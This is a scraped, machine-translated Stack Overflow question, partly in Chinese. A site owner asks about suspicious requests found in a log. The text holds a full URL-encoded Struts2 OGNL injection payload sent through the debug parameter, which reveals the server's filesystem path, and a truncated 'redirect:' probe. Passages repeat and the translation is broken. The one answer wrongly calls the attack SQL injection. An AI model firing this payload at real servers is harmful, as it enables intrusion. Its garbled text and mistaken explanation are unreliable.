Closed. This question does not meet Stack Overflow guidelines。它当前不接受答案。
想改善这个问题吗? Update the question,所以它是on-topic,用于堆栈溢出。
4年前关闭。
今天,我已经登录并第一次看到它:
之后又一个:
会导致什么?注射数据库?病毒?
想改善这个问题吗? Update the question,所以它是on-topic,用于堆栈溢出。
4年前关闭。
今天,我已经登录并第一次看到它:
mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()
之后又一个:
mysite.com/?redirect:会导致什么?注射数据库?病毒?
最佳答案
似乎有人试图利用struts2中的SQL注入漏洞来执行远程代码执行。
见http://struts.apache.org/docs/s2-016.html
09-05 22:03